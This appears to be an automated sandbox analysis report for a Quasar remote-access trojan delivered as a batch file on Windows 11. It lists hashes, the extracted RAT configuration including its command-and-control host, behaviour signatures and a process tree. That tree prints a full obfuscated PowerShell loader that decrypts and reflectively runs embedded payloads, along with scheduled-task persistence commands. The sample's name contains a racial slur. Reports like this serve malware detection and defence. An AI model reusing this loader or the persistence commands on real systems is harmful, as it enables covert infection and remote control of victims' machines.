Analysis
-
max time kernel
434s -
max time network
435s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
10-01-2025 05:00
Static task
static1
Behavioral task
behavioral1
Sample
NiggaKernel.bat
Resource
win11-20241007-en
General
-
Target
NiggaKernel.bat
-
Size
1.8MB
-
MD5
049e158c496e1d81b51d8c3e85d769dc
-
SHA1
29717cc27f715c86e95b2027c87331c7b7f6a688
-
SHA256
8a571346e3190daf5e2b5b30dea032feab8726dd423ec1446f0863d76cc9cd80
-
SHA512
d81710454d8424e19b009b86d71938d101eee2a5b8b260a062d1931f59e1b38c0b05192b684c69218d46fee191744d7871c32e96376033347fa310274753163d
-
SSDEEP
24576:6JTtOJAdMrNp8QL585hVGeA7TycnoAE33Lio++/q1Bm6dS585gL2n6:8rEtoA+7qa6f5zn6
Malware Config
Extracted
quasar
1.4.1
NiggaVictim
TheSillyValor-36700.portmap.host:36700
6c3995b9-837d-4aad-89fd-b25da7ae4c30
-
encryption_key
029FCE648CA3D58DA3A16C9A8EBE57C1E2BA129C
-
install_name
niggakernel.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
niggakernel
-
subdirectory
niggakernel
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/1124-50-0x0000029CED960000-0x0000029CEDC84000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 5700 powershell.exe 4952 powershell.exe 1124 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1900 niggakernel.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\niggakernel\niggakernel.exe powershell.exe File opened for modification C:\Windows\system32\niggakernel\niggakernel.exe powershell.exe File opened for modification C:\Windows\system32\niggakernel powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1576 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 5700 powershell.exe 5700 powershell.exe 4952 powershell.exe 4952 powershell.exe 1124 powershell.exe 1124 powershell.exe 1900 niggakernel.exe 1900 niggakernel.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5700 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeIncreaseQuotaPrivilege 4952 powershell.exe Token: SeSecurityPrivilege 4952 powershell.exe Token: SeTakeOwnershipPrivilege 4952 powershell.exe Token: SeLoadDriverPrivilege 4952 powershell.exe Token: SeSystemProfilePrivilege 4952 powershell.exe Token: SeSystemtimePrivilege 4952 powershell.exe Token: SeProfSingleProcessPrivilege 4952 powershell.exe Token: SeIncBasePriorityPrivilege 4952 powershell.exe Token: SeCreatePagefilePrivilege 4952 powershell.exe Token: SeBackupPrivilege 4952 powershell.exe Token: SeRestorePrivilege 4952 powershell.exe Token: SeShutdownPrivilege 4952 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeSystemEnvironmentPrivilege 4952 powershell.exe Token: SeRemoteShutdownPrivilege 4952 powershell.exe Token: SeUndockPrivilege 4952 powershell.exe Token: SeManageVolumePrivilege 4952 powershell.exe Token: 33 4952 powershell.exe Token: 34 4952 powershell.exe Token: 35 4952 powershell.exe Token: 36 4952 powershell.exe Token: SeIncreaseQuotaPrivilege 4952 powershell.exe Token: SeSecurityPrivilege 4952 powershell.exe Token: SeTakeOwnershipPrivilege 4952 powershell.exe Token: SeLoadDriverPrivilege 4952 powershell.exe Token: SeSystemProfilePrivilege 4952 powershell.exe Token: SeSystemtimePrivilege 4952 powershell.exe Token: SeProfSingleProcessPrivilege 4952 powershell.exe Token: SeIncBasePriorityPrivilege 4952 powershell.exe Token: SeCreatePagefilePrivilege 4952 powershell.exe Token: SeBackupPrivilege 4952 powershell.exe Token: SeRestorePrivilege 4952 powershell.exe Token: SeShutdownPrivilege 4952 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeSystemEnvironmentPrivilege 4952 powershell.exe Token: SeRemoteShutdownPrivilege 4952 powershell.exe Token: SeUndockPrivilege 4952 powershell.exe Token: SeManageVolumePrivilege 4952 powershell.exe Token: 33 4952 powershell.exe Token: 34 4952 powershell.exe Token: 35 4952 powershell.exe Token: 36 4952 powershell.exe Token: SeIncreaseQuotaPrivilege 4952 powershell.exe Token: SeSecurityPrivilege 4952 powershell.exe Token: SeTakeOwnershipPrivilege 4952 powershell.exe Token: SeLoadDriverPrivilege 4952 powershell.exe Token: SeSystemProfilePrivilege 4952 powershell.exe Token: SeSystemtimePrivilege 4952 powershell.exe Token: SeProfSingleProcessPrivilege 4952 powershell.exe Token: SeIncBasePriorityPrivilege 4952 powershell.exe Token: SeCreatePagefilePrivilege 4952 powershell.exe Token: SeBackupPrivilege 4952 powershell.exe Token: SeRestorePrivilege 4952 powershell.exe Token: SeShutdownPrivilege 4952 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeSystemEnvironmentPrivilege 4952 powershell.exe Token: SeRemoteShutdownPrivilege 4952 powershell.exe Token: SeUndockPrivilege 4952 powershell.exe Token: SeManageVolumePrivilege 4952 powershell.exe Token: 33 4952 powershell.exe Token: 34 4952 powershell.exe Token: 35 4952 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4948 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 5620 wrote to memory of 5700 5620 cmd.exe 78 PID 5620 wrote to memory of 5700 5620 cmd.exe 78 PID 5700 wrote to memory of 4952 5700 powershell.exe 79 PID 5700 wrote to memory of 4952 5700 powershell.exe 79 PID 5700 wrote to memory of 2080 5700 powershell.exe 82 PID 5700 wrote to memory of 2080 5700 powershell.exe 82 PID 2080 wrote to memory of 3364 2080 WScript.exe 83 PID 2080 wrote to memory of 3364 2080 WScript.exe 83 PID 3364 wrote to memory of 1124 3364 cmd.exe 85 PID 3364 wrote to memory of 1124 3364 cmd.exe 85 PID 1124 wrote to memory of 1576 1124 powershell.exe 86 PID 1124 wrote to memory of 1576 1124 powershell.exe 86 PID 1124 wrote to memory of 1900 1124 powershell.exe 88 PID 1124 wrote to memory of 1900 1124 powershell.exe 88 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NiggaKernel.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jeg6IKA3PYqnc0jqPYpEjYg5Ext6Gg7nONNSKtICfDs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP0G+VOQ29D99pgE3ouSrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lzJIU=New-Object System.IO.MemoryStream(,$param_var); $eCZeV=New-Object System.IO.MemoryStream; $RWNMt=New-Object System.IO.Compression.GZipStream($lzJIU, [IO.Compression.CompressionMode]::Decompress); $RWNMt.CopyTo($eCZeV); $RWNMt.Dispose(); $lzJIU.Dispose(); $eCZeV.Dispose(); $eCZeV.ToArray();}function execute_function($param_var,$param2_var){ $PUspL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WpQxW=$PUspL.EntryPoint; $WpQxW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NiggaKernel.bat';$bUeYL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NiggaKernel.bat').Split([Environment]::NewLine);foreach ($vtAXs in $bUeYL) { if ($vtAXs.StartsWith(':: ')) { $ZmRZW=$vtAXs.Substring(3); break; }}$payloads_var=[string[]]$ZmRZW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_413_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_413.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_413.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_413.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jeg6IKA3PYqnc0jqPYpEjYg5Ext6Gg7nONNSKtICfDs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP0G+VOQ29D99pgE3ouSrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lzJIU=New-Object System.IO.MemoryStream(,$param_var); $eCZeV=New-Object System.IO.MemoryStream; $RWNMt=New-Object System.IO.Compression.GZipStream($lzJIU, [IO.Compression.CompressionMode]::Decompress); $RWNMt.CopyTo($eCZeV); $RWNMt.Dispose(); $lzJIU.Dispose(); $eCZeV.Dispose(); $eCZeV.ToArray();}function execute_function($param_var,$param2_var){ $PUspL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WpQxW=$PUspL.EntryPoint; $WpQxW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_413.bat';$bUeYL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_413.bat').Split([Environment]::NewLine);foreach ($vtAXs in $bUeYL) { if ($vtAXs.StartsWith(':: ')) { $ZmRZW=$vtAXs.Substring(3); break; }}$payloads_var=[string[]]$ZmRZW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "niggakernel" /sc ONLOGON /tr "C:\Windows\system32\niggakernel\niggakernel.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:1576
-
-
C:\Windows\system32\niggakernel\niggakernel.exe"C:\Windows\system32\niggakernel\niggakernel.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1900
-
-
-
-
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4948
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize10KB
MD571a6b59e08e25451e52675c842fae23c
SHA1565a97673954a9209c7a05fba20b89d10b88025f
SHA2565b96212d3d1347b76c8c1c64b2f7ef981242bedd3b84b766b543d56dbbf8dbd6
SHA5125cc98eb2aa02e2e69165170451d89dd880893e6b07440bb84fbab6cf92cb558bd58c2235d8d64ff43d380c5e9869827800d310ee67950bb21b498d89fbb5aab3
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize10KB
MD5ef4d9165f280b4d556f349f896b81ce9
SHA1ddfe1709a292d9900687d4fe0b4c8b2429d848a3
SHA2568add12630f4210146f1c0f543e34f61810eadbb6759b6eb3a6303337155c9cb2
SHA512e8b2c08605f8c3c9eaf0a8f905e65829ea2ff4e0d45c79f171ff685e80fc74e4f7858b4975fac8ebfd4dc3b21a14fe571e446889d4022400e84d8193053152ac
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD5049e158c496e1d81b51d8c3e85d769dc
SHA129717cc27f715c86e95b2027c87331c7b7f6a688
SHA2568a571346e3190daf5e2b5b30dea032feab8726dd423ec1446f0863d76cc9cd80
SHA512d81710454d8424e19b009b86d71938d101eee2a5b8b260a062d1931f59e1b38c0b05192b684c69218d46fee191744d7871c32e96376033347fa310274753163d
-
Filesize
115B
MD5901e4cac30adb9778de40beae3207930
SHA1ef6af127991a6370f42c56ef9985ab50ebe92ad4
SHA2567f7461eb611e2a9eedfc8e5dd65ea6bc4440fb34fbde69cfea69a401ffc5185a
SHA5122c4ca98b08ce5cfc782a81c4fa36ddfd19dd1ab4106d66cae73ba3c8a2f3f95089c7a7399974bdc30ba200dc4216ae1065027c0d1dae782bb13e031914f01ca4
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d